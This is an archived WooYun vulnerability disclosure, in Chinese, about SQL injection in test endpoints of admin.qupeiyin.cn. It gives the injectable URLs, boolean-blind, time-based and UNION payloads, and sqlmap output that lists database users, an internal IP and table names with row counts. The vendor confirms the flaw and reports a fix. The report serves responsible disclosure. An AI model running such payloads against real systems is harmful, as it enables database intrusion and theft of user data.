乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-11: 细节已通知厂商并且等待厂商处理中 2015-05-13: 厂商已经确认,细节仅向厂商公开 2015-05-23: 细节向核心白帽子及相关领域专家公开 2015-06-02: 细节向普通白帽子公开 2015-06-12: 细节向实习白帽子公开 2015-06-27: 细节向公众公开
233
1,http://admin.qupeiyin.cn/Weixin/test/share?study_show_id=12,http://admin.qupeiyin.cn/Weixin/test/dubbing?course_id=payload:-1%20OR%203*2*1%3d6%20AND%2000014%3d00014-1%20OR%203*2*2%3d6%20AND%2000014%3d00014
Parameter: study_show_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: study_show_id=1) AND 3416=3416 AND (2897=2897 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: study_show_id=1) AND (SELECT * FROM (SELECT(SLEEP(5)))yjyQ) AND (1949=1949 Type: UNION query Title: MySQL UNION query (66) - 8 columns Payload: study_show_id=1) UNION ALL SELECT 66,66,CONCAT(0x7178766a71,0x65475757677041747272,0x716b6b7171),66,66,66,66,66#---web application technology: Nginx, PHP 5.5.7back-end DBMS: MySQL 5.0.12current user is DBA: Falsedatabase management system users [4]:[*] 'ishow'@'%'[*] 'ishow'@'10.%'[*] 'ishow'@'115.236.179.162'[*] 'root'@'localhost'available databases [5]:[*] feizhuoa[*] information_schema[*] ishowgroup[*] peiyin[*] performance_schemaback-end DBMS: MySQL 5.0.12Database: peiyin+-----------------------+---------+| Table | Entries |+-----------------------+---------+| visitor | 3885620 || messages | 2531915 || fans | 2068213 || show_top | 1435084 || study_show_info | 1434986 || study_show | 1434983 || comments | 1383915 || study_show_support | 1239518 || file_copy | 1183450 || study_show_copy | 1161214 || ucenter_member | 953757 || userinfo | 953731 || wechat_userinfo | 897580 || auth_token | 850685 || feedback_msglog | 834073 || pushinfo | 672344 || course_collect | 644258 || use_log | 630396 || outside_show_support | 474405 || picture | 463272 || words | 319321 || photo | 249939 || tieup_log | 159747 || user_spread | 142411 || messages_log | 112034 || spread_member | 102265 || album_through | 96479 || file | 40506 || feedback_msg | 37923 || guestbook | 35117 || search_keywords | 23560 || chat_wait_process | 19495 || school | 18819 || feedback | 18763 || spread_check | 16012 || course | 8284 || chat_members | 8200 || course_copy | 7931 || course_copy1 | 7931 || action_log | 7514 || home_recom | 6938 || course_nature | 6391 || activity_user | 3370 || stick | 3285 || syn_video | 3064 || spreader | 2684 || chat_member_course | 1973 || tch_class | 1597 || ugc_user_course | 1524 || slider | 1270 || course_edit | 1185 || course_album | 1069 || classes | 1050 || study_recomlog | 1031 || course_info | 819 || chat_task | 760 || winning_record | 731 || chat_group | 659 || location | 603 || area | 598 || auth_rule | 416 || album | 373 || menu | 346 || ugc_contribution | 296 || course_feedback | 269 || wechat_study_show | 256 || checksum | 250 || ugc_user | 241 || action_use | 224 || statistics | 185 || lessons_supports | 179 || report | 162 || push_message | 141 || camps | 114 || wechat_comment | 112 || ugc_group_photo | 67 || syn_page | 59 || lessons | 43 || auth_group_access | 42 || chat_category | 38 || wechat_support_record | 38 || nature | 37 || user_wisdom | 35 || gotye_regfail | 33 || teacher_apply | 33 || lessons_reserve | 31 || config | 30 || ugc_group | 26 || nature_copy | 23 || recommand | 23 || week_moon | 18 || mobile_code | 17 || auth_group | 16 || wechat_course | 15 || campus | 12 || `action` | 11 || hooks | 11 || auth_extend | 8 || ishow_class | 8 || article | 7 || lottery | 6 || course_category | 5 || gotye_msgid | 5 || basic_data | 4 || room | 4 || teacher | 4 || addons | 3 || activity | 2 || album_counter | 1 || course_counter | 1 || wechat_spread | 1 |+-----------------------+---------+
~~
危害等级:高
漏洞Rank:10
确认时间:2015-05-13 10:38
非常感谢及时发现这个漏洞,这个属于开发忘将测试代码注释导致,现已修复
暂无